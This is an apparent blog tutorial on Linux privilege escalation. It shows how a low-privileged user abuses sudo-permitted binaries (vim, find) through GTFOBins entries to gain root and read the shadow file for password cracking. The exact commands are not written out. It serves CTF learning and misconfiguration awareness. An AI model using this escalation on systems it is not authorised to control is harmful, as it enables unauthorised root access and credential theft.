Oh! Didn’t see you there. You may wonder how you can get root access as quick as the blink of an eye… So you are in the right place.
What do I mean by ‘root access’?
You may be familiar with the Windows’ Administrator account, that, like our root in Unix, is a superuser account designated for system administration purposes; meaning that it can perform any task without getting blocked due to the lack of sufficient permission.
Alright, let’s go to the fun part. Achieving the root user.
Let’s say you have access to a server, and you just need to get that juicy shadow file to perform a brute force attack.
So you are stuck in this poor low-privileged user called Simba (Just like my cat, what a coincidence!) and you try to see the shadow file on the server.
Oh shut! We don’t have enough permissions to see it! What can we do now?
Well, the sudo command has a –list option which will show us all the allowed and forbidden commands for the current user.
So let’s try it out!
As we can see, the interesting part is shown at the bottom of the command output. It says that simba, as a non root user, can execute 3 commands with root permissions. Have you found them already?
Find, less and vim commands, but they don’t seem to be harmful at all!
Not yet, but bear with me for a little longer. Now is the time when this amazing database full of binary commands comes into place.
As this page says, “GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.” And thanks to this list we can have an advantage to get our precious root privilege.
Let the fun begin
So, now having our sudo available commands, and the magic list, let’s see how we can make good use of them.
Let’s start with the vim binary. You can now try the privilege escalation yourself alongside simba.
1. Go to the GTFOBins page and look for the sudo section of the vim command.
2. There, you will see different commands with vim, that depending on the system, will give us the root access. For now, the (a) option is enough.
3. Time to try it on our console!
And just like a magic trick, we made Simba disappear and instead make the root account appear!
Will we be able to see the contents of the server’s shadow file now that we have gained root privileges? There is only one way to find out… and indeed, we now have in our hands what we wanted.
Want to keep hacking?
Let’s try it one more time with another command Simba has available.
This time, Simba will chose to exploit the find binary. So, again, we head to the https://gtfobins.github.io/ page to search for the find sudo section.
And now, will again try to exploit this in order to escalate privileges.
Incredibly simple, right?
Conclusion
So now, you and simba know how to gain root access when a low-privileged user have some binaries available to run as root due to security misconfigurations. It is time to play some CTFs with this trick up our sleeve!
Happy Hacking!